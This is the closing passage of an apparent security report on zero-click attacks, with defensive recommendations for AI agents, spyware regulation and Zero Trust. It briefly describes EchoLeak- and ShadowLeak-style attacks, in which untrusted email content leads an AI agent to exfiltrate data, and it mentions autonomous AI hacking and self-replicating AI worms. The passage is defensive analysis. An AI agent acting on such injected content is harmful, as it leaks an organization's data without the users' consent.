• Applying the Principle of Least Privilege to AI: An AI agent's permissions must be aggressively restricted.
  • Context Segregation: The data that an AI agent can access for its RAG system must be partitioned into distinct trust tiers. For example, data from internal, authenticated sources should be in a separate tier from data from external, untrusted sources like incoming emails. The agent should be architecturally prevented from mixing context from different tiers in a single response without explicit, interactive user confirmation. Disabling the use of external email context in tools like Microsoft 365 Copilot is a direct and effective mitigation for EchoLeak-style attacks.
  • Action Confirmation: Any "active" capability granted to an AI agent—such as the ability to send an email, access a URL, or call an external API—should be intercepted by a security layer that requires explicit user consent for each action. The agent should not be able to autonomously communicate with the outside world.
• Robust AI Model Guardrails: Security must be built into the AI system itself.
  • Use of a "Moderator" AI: A dual-model approach can be highly effective. A primary, powerful AI agent performs the main task, while a second, simpler, and more constrained "moderator" AI scans all inputs to the primary agent and all outputs from it. The moderator's sole function is to flag suspicious instructions, potential PII leaks, or outputs that violate security policy.
  • Continuous Adversarial Testing (Red-Teaming): Organizations deploying AI agents must treat them as critical software and subject them to continuous, rigorous security testing. Proactively attacking the agents with the latest prompt injection and jailbreaking techniques is the only way to find and fix vulnerabilities before malicious actors exploit them.

The Role of Defensive AI

To counter threats that are themselves powered by AI and operate at machine speed, defenses must also leverage AI. Defensive AI is crucial for moving from a reactive to a proactive and predictive security posture.

• AI-Powered Anomaly Detection: The key strength of AI in defense is its ability to learn a baseline of normal behavior for a network, a user, or a device. By continuously analyzing vast amounts of telemetry data, a machine learning system can identify subtle deviations from this baseline that are indicative of a compromise, even if the attack is a novel zero-day exploit for which no signature exists. This behavioral analysis is one of the most promising methods for detecting the post-compromise activity of a successful zero-click attack.
• Autonomous Defensive Agents: The logical evolution of AI-driven defense is the deployment of autonomous defensive agents. These systems would not only detect threats but would also be empowered to take immediate, automated response actions. For example, upon detecting anomalous behavior from an employee's mobile device, a defensive agent could instantly isolate that device from the network to prevent lateral movement, long before a human security analyst could even review the alert. This machine-speed response is the necessary counter to machine-speed attacks.

Governmental and Regulatory Imperatives

The threat posed by zero-click attacks, particularly those developed by commercial spyware vendors, transcends the capabilities of individual organizations and requires action at the national and international level.

• Regulation of the Commercial Spyware Market: The widespread abuse of tools like Pegasus against journalists, activists, and political opposition highlights the urgent need for stronger international controls and export regulations on the sale of these offensive cyber capabilities. This is a matter of protecting not just cybersecurity but also human rights and democratic principles.
• Vulnerability Disclosure and Management: Governments have a critical role to play in managing the vulnerability ecosystem. There is an ongoing debate about whether government agencies should stockpile zero-day vulnerabilities for their own intelligence or offensive purposes, or disclose them to vendors so they can be patched, protecting the entire digital ecosystem. Policies that favor disclosure and support robust bug bounty and vulnerability disclosure programs (VDPs) are essential for improving collective defense.
• Promotion of Cyber Resilience: Government agencies, such as the Cybersecurity and Infrastructure Security Agency (CISA) in the United States, must continue to serve as a central hub for threat intelligence sharing, publishing best practices, and providing guidance to help both public and private sector organizations build resilience against these advanced cyber threats.

The entire threat landscape detailed in this report points toward a single, overarching strategic conclusion: the adoption of a Zero Trust architecture is no longer a best practice, but an existential necessity. The core principles of Zero Trust—"never trust, always verify," assume breach, and enforce least-privilege access—directly counter the zero-click threat model. In a Zero Trust environment, a compromised device is not automatically trusted on the network, an AI agent's attempt to access unauthorized data would be blocked, and lateral movement would be severely restricted. It is the architectural framework that best aligns with the reality of a world where perimeters are porous and silent compromise is a constant possibility, making it paramount for modern cybersecurity strategies.

Conclusion

---

The evolution of zero-click attacks marks a definitive turning point in cybersecurity. This threat class has systematically dismantled long-held security assumptions, proving that no amount of user training can defend against an exploit that requires no user interaction. The journey from memory corruption vulnerabilities in messaging apps to semantic exploits against autonomous AI agents is not merely an incremental advancement in attacker technique; it is a fundamental shift in the plane of conflict. The battleground has ascended from the machine code layer to the logic and reasoning layer, a domain where traditional security tools are rendered ineffective.

The analysis of landmark exploits like FORCEDENTRY and AirBorne reveals a sophisticated and dangerous arms race. Commercial entities are now successfully developing and selling capabilities that were once the exclusive domain of the world's most advanced intelligence agencies, leading to the proliferation of these weapons and their use against civil society. The expansion of the attack surface to encompass entire device ecosystems and wireless protocols demonstrates that the threat is no longer confined to a single application but is endemic to the very fabric of our interconnected world, demanding robust cybersecurity measures.

The convergence of this threat with Artificial Intelligence represents the most profound challenge. AI agents, designed for autonomy and integration, present a new and highly vulnerable attack surface. Exploits like EchoLeak and ShadowLeak are the harbingers of a future where attackers can turn an organization's own productivity tools into instruments of data exfiltration, operating silently from within the trusted cloud environment. This creates an undeniable "trust tax" on automation, forcing organizations to view every new AI capability through the lens of its potential security blast radius.

Simultaneously, the weaponization of AI for offensive purposes threatens to collapse the timeframe for vulnerability exploitation from months to minutes, making reactive security postures untenable. The demonstrated ability of AI agent teams to autonomously hack systems in zero-day scenarios and the theoretical potential of self-replicating AI worms like Morris II signal the dawn of fully automated cyber warfare.

In this emergent landscape, defense requires a paradigm shift. Foundational cyber hygiene remains critical, but it must be augmented by a new playbook tailored for the AI era, focusing on input sanitization, strict least-privilege controls for agents, and continuous adversarial testing. The future of defense will inevitably be an algorithmic arms race, where autonomous defensive AI agents are the only viable counter to autonomous offensive threats. This reality leads to an inescapable strategic imperative: the universal adoption of a Zero Trust architecture. When silent, invisible compromise is a constant and imminent possibility, the only rational security posture is to assume that no user, device, or application can be trusted by default. The principles of Zero Trust are no longer an industry best practice; they are the logical and necessary response to the existential threat posed by the silent intrusion, ensuring resilient cybersecurity.